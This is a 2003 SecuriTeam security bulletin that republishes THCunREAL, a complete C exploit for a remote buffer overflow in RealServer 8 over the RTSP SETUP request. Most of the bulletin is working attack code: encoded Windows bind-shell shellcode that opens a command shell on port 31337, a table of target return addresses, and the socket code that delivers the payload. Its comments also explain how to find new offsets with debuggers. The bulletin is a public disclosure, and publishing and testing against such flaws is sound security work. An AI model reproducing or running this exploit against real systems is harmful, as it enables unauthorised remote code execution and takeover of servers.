[EXPL] RealServer 8 Remote Buffer Overflow Vulnerability (Exploit, SETUP, RTSP)

From: support@securiteam.com
Date: 02/15/03

  • Next message: support@securiteam.com: "[TOOL] WaveLock, WLAN Policy Enforcement" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 15 Feb 2003 22:10:19 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      RealServer 8 Remote Buffer Overflow Vulnerability (Exploit, SETUP, RTSP)
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in Real Networks' RealServer allows a remote attacker to
    cause it to crash, while executing arbitrary code (for additional
    information see our previous article:
    <http://www.securiteam.com/securitynews/5IP0A1F96G.html> RealSystem Server
    and Proxy Buffer Overflow Vulnerability). The following exploit code can
    be used to test your system for the mentioned vulnerability

    DETAILS

    Vulnerable systems:
     * RealServer version 8.0.0.149
     * RealServer version 8.0.2

    /*****************************************************************************/
    /* THCunREAL 0.1 - Wind0wZ remote root exploit */
    /* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) */
    /* THC PUBLIC SOURCE MATERIALS */
    /* */
    /* This exploit can be freely distributed ! If u r smart enough you can
    add */
    /* further offsets for other OS Versions/Types/Servicespacks blabla.... */
    /* */
    /* The exploit was tested on 4 different boxes with RealServer 8.0.0.149
    */
    /* The bug is exploitable on Realservers < 8.0.2 */
    /* */
    /* While probing lot's of boxes via 'OPTIONS / RTSP/1.0' on TCP port 554
    */
    /* i noticed that 99% of the probed machines are not up2date yet ! =;O) */
    /* */
    /* The shellcode used in diz exploit is completely offsetless and XOR 0x20
    */
    /* encoded, coz Realserver doesn't allow the following bytes in the SETUP
    */
    /* field : 0x00,0x0d,0x0a,0x25,0x20,0xff ! That's also the reason why i
    use */
    /* mov dl,0x1f + add dl,0x01 for xor 0x20 encoding. hehehe... */
    /* */
    /* The shellcode itself scans for the KERNEL32.DLL by using FS:0 +
    searching */
    /* for 'MZ' entry, followed by analysing the PE-Header for API offsets */
    /* needed by this shellcode. After that we can load WS2_32.DLL for socket
    */
    /* APIs and begin the usual shellcode process ! Thanx to several virus */
    /* coders and Halvar Flake for that rocking idea ! I was wondering why so
    */
    /* less people aren't using it today in their exploits ! Just because LSD
    */
    /* has made this technique public on HiverCon 2002 ! Actually this one
    isn't */
    /* optimized, but later shellcodes will have a size < 300 bytes. */
    /* */
    /* After successful exploitation of this bug, a commandshell should spawn
    on */
    /* TCP port 31337 ! Use netcat to connect to this port ! */
    /* */
    /* To find further offsets use softice on windows or gdb on linux boxes !
    */
    /* If you're debbugging with softice do the following to find offsets : */
    /* Start the Realserver 8 ! ;) */
    /* Enter softice and do the following commands : */
    /* addr rmserver + bpx 405cfc */
    /* Start the exploit and softice will break on the following lines of code
    : */
    /* */
    /* mov ecx,[eax] */
    /* lea edx,[ebp+FFFFF000] */
    /* push 00 */
    /* push edx */
    /* push 80004005 */
    /* push 80004005 */
    /* push 03 */
    /* call [ecx+0c] */
    /* */
    /* As we can overwrite EAX, we have to create 3 values */
    /* (2 retlocs and 1 retaddr), to get control of a vuln system ! */
    /* The good news is, that just the EAX value can differ on different
    OSs/SPs */
    /* The rest can be calculated ! */
    /* retloc2 = retloc1-8; */
    /* retaddr = retloc1+8; */
    /* */
    /* Unfortunately i hadn't a Linux/Sparc or whatever Platform Realserver 8
    */
    /* runs on. I just know it's also exploitable on other OSs ! */
    /* So if u wanna exploit other platforms, try to get Realserver 8 and use
    */
    /* gdb to find out, how this can be exploited ! Good luck ! */
    /* */
    /* compile with MS Visual C++ : cl THCunREAL.c /link ws2_32.lib */
    /* */
    /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX,
    dvorak, */
    /* scut, stealth, zip, zilvio and the rest of the combo ...... */
    /*****************************************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <winsock2.h>

    struct TARGETS {
       char *winver;
       unsigned long retloc1;
    };

    struct TARGETS targets [] = {
    {"Windows 2000 - SP2", 0x0434ecad},
    {"Windows 2000 - SP3", 0x0433ecad},
    {"Windows XP SP1", 0x03fdecad},
    {"Windows NT4 SP6a", 0x0477ecb1},
    {NULL,0},
    };

    char w32portshell[] =
    "\x8b\x7d\x08\x33\xc9\x33\x02\xb2\x1f\x80\xc2\x01\x66\x81\xc1"
    "\x9d\x02\x83\xc7\x25\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xcb"
    "\x49\xa5\xb6\xdf\xdf\xec\x67\xba\x5c\x3b\xea\x07\x1d\x96\x45"
    "\x45\xe3\x4c\x2c\x01\x16\xc2\xb7\x86\x51\x16\x34\x68\x34\xef"
    "\x1c\x61\x48\x37\xee\xed\xe9\xb8\xf2\xc0\x01\x99\xda\x7d\x6c"
    "\xf8\x25\xda\x27\xbb\x5e\x90\x49\xa0\xdf\xdf\xdf\xdf\x4b\xf8"
    "\xc3\x43\x49\x4e\x44\x42\x45\xf1\xf7\x43\x54\xf1\xf7\x53\x45"
    "\x4e\x44\x53\x45\x43\x56\x52\xdf\xdf\xdf\xdf\x77\x73\x12\x7f"
    "\x13\x12\x0e\x64\x6c\x6c\xdf\x7c\x43\x4d\x44\x0e\x45\x58\x45"
    "\xdf\xcb\x22\xcb\x25\xc8\xd9\xdf\xdf\xdf\x7d\xa3\xcd\x54\x11"
    "\xe0\xcb\x7b\x75\xa9\xc5\x40\xab\x65\x28\xab\x78\x1c\x21\xe3"
    "\xab\x6b\x58\x21\xe1\xab\x59\x3c\x21\xe7\x77\xab\x59\x04\x21"
    "\xe7\x77\xdf\x51\x30\x61\xab\x51\x3f\x69\x21\xe6\x11\xe9\xa9"
    "\xe7\x11\xfb\x61\x8d\x21\xd8\x76\xa9\xe6\x11\xe0\x8c\x21\xe3"
    "\xe1\xeb\x28\xa4\xe0\x55\xd4\x1b\x7d\x2c\x7e\x55\xc5\x78\x7a"
    "\x09\xe1\x2f\x97\x2c\x6a\x7e\xab\x24\xae\x21\xd8\xa9\x64\x04"
    "\x3c\x41\x7d\xe3\x94\x30\x09\xe4\x11\xe9\x44\xab\x31\xa9\xf7"
    "\xab\x2f\xa1\xd9\xdf\xdf\xdf\xdf\x54\x24\xa9\xef\xcb\xd2\xab"
    "\x5f\x24\x46\x11\xdf\x11\xe9\x95\x30\x46\xab\x37\x46\xa1\xda"
    "\x6d\x7a\x54\x24\x09\xef\xcb\xd2\xa9\x5d\xdc\xad\x7d\x5c\xad"
    "\x55\x27\x8d\x70\x60\x54\x2e\xb0\x77\xdf\xf3\xa9\x66\xdc\xa9"
    "\xe1\xc9\xcd\xdf\xdf\xdf\x10\xe0\xa6\x65\x41\xa4\xe0\x54\x2d"
    "\xad\x75\x77\x72\xdf\xf1\xa9\xe7\xc9\xf7\xdf\xdf\xdf\xad\x9d"
    "\x48\xdf\xdf\xdf\x77\xdf\x75\x0f\xad\x55\x42\x21\xe7\x85\x85"
    "\x10\xe0\xa8\x27\x11\xfb\x73\x4a\x21\x4a\x22\xdf\x75\x1b\xa9"
    "\x65\xc4\xa9\x7d\xd0\xa9\x7d\xd4\xa9\x7d\xcc\x93\x22\xa9\x7d"
    "\xc8\x2f\x97\x7d\x22\x2f\x97\x65\x24\x11\xf8\x46\xa9\x65\xca"
    "\x4a\x30\xad\x7d\xc8\x73\xdf\x55\xc4\xdf\x75\x1f\x4a\x21\xdf"
    "\x55\xc4\xdf\x75\x67\x11\xe0\xa9\x65\xfc\x60\xa9\x65\xc0\x90"
    "\x2c\xa9\x65\xf8\x11\xe0\x70\xad\x7d\xf8\x73\xa9\xf9\xa3\xcb"
    "\x24\x73\xa3\xcb\x24\x73\x70\x71\xa3\xcb\x24\x73\xa3\xcb\x24"
    "\x73\xab\x7d\x2b\xdf\xf3\xdf\xf3\xad\x65\xa4\x70\xdf\x75\x37"
    "\xab\x65\xf4\xa9\x65\xe4\xa9\x65\xe0\xab\x65\xe8\xa9\x65\x9c"
    "\x11\xe0\x46\xa9\x65\x94\xde\xe0\xde\xe4\xa9\x65\x90\xde\xe8"
    "\xa6\x65\x4a\xad\xbd\x48\xdf\xdf\xdf\xad\xb5\x54\xdf\xdf\xdf"
    "\xad\x6d\xa4\x11\xe0\x72\x71\x70\x70\x70\x4a\x21\x70\x70\x70"
    "\x73\xdf\x75\x27\x11\xe0\x70\x70\xdf\x55\xc4\xdf\x75\x63\xa9"
    "\x65\xc4\xad\x9d\x4c\xcf\xdf\xdf\x4a\x5e\xdf\x75\x2f\x11\xfb"
    "\x73\xad\xad\x50\xdf\xdf\xdf\x71\x73\x73\x73\xdf\x55\xf0\xdf"
    "\x75\x3f\x19\xbd\x50\xdf\xdf\xdf\x54\x17\x73\xad\xb5\x4c\xdf"
    "\xdf\xdf\x72\xab\xb5\x50\xdf\xdf\xdf\x94\xde\x10\xe0\x46\xa5"
    "\xe2\x54\x24\x96\x22\x10\xf2\x72\x77\xdf\x55\xf0\xdf\x75\x03"
    "\xa5\xe0\x54\x18\x73\xdf\x95\x4c\xdf\xdf\xdf\x77\xdf\x55\xc4"
    "\xdf\x75\x6b\xcb\x83\x73\x11\xe0\x94\x22\x70\x77\xdf\x55\xc4"
    "\xdf\x75\x6f\x60\x54\x38\x68\x54\x35\x73\xad\xb5\x50\xdf\xdf"
    "\xdf\x72\x70\x77\xdf\x55\xec\xdf\x75\x07\xc9\x5b\xdf\xdf\xdf"
    "\x48\xdf\xdf\xdf\xdf\xdf\x75\x2f";

    void usage();

    int main(int argc, char *argv[])
    {
      unsigned short realport=554;
      unsigned int sock,addr,i,rc;
      unsigned char exploit_buffer[4124];
      unsigned long retloc2, retaddr;
      struct sockaddr_in mytcp;
      struct hostent * hp;
      WSADATA wsaData;

      printf("\nTHCunREAL v0.1 - Wind0wZ remote root sploit for Realserver <
    8.0.2\n");
      printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");

      if(argc<3)
       usage();

      if((atoi(argv[2]))>3)
       usage();
      
     retloc2 = targets[atoi(argv[2])].retloc1-8;
     retaddr = targets[atoi(argv[2])].retloc1+8;

     memset(exploit_buffer,'Z',4123);
     memcpy(exploit_buffer,"SETUP /",7);
     *(unsigned long *)&exploit_buffer[7] = retloc2;
     *(unsigned long *)&exploit_buffer[7 + 4] = retaddr;
     memcpy(&exploit_buffer[15],w32portshell,strlen(w32portshell));
     *(unsigned long *)&exploit_buffer[4086] = targets[atoi(argv[2])].retloc1;
     memcpy(&exploit_buffer[4090]," RTSP/1.0\r\nTransport:
    THCr0x!\r\n\r\n",33);
     
      if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
      {
       printf("WSAStartup failed !\n");
       exit(-1);
      }
      
      hp = gethostbyname(argv[1]);

      if (!hp){
       addr = inet_addr(argv[1]);
      }
      if ((!hp) && (addr == INADDR_NONE) )
      {
       printf("Unable to resolve %s\n",argv[1]);
       exit(-1);
      }

      sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      if (!sock)
      {
       printf("socket() error...\n");
       exit(-1);
      }
      
      if (hp != NULL)
       memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
      else
       mytcp.sin_addr.s_addr = addr;

      if (hp)
       mytcp.sin_family = hp->h_addrtype;
      else
       mytcp.sin_family = AF_INET;

      mytcp.sin_port=htons(realport);
     
      rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
    sockaddr_in));
      if(rc==0)
      {
        send(sock,exploit_buffer,4123,0);
        printf("\nexploit send .... sleeping a while ....\n");
        Sleep(1000);
        printf("\nok ... now try to connect to port 31337 via netcat !\n");
      }
      else
       printf("can't connect to realserver port!\n");
      
      shutdown(sock,1);
      closesocket(sock);
      exit(0);
    }

     
    void usage()
    {
     unsigned int a;
     printf("\nUsage: <Host> <target-type>\n");
     printf("\nTargets available :\n\n");
     for (a=0; targets[a].winver != NULL; a++)
      printf ("%d) - %s\n", a, targets[a].winver);
     exit(0);
    }

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:jcyberpunk@thehackerschoice.com> Johnny Cyberpunk.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.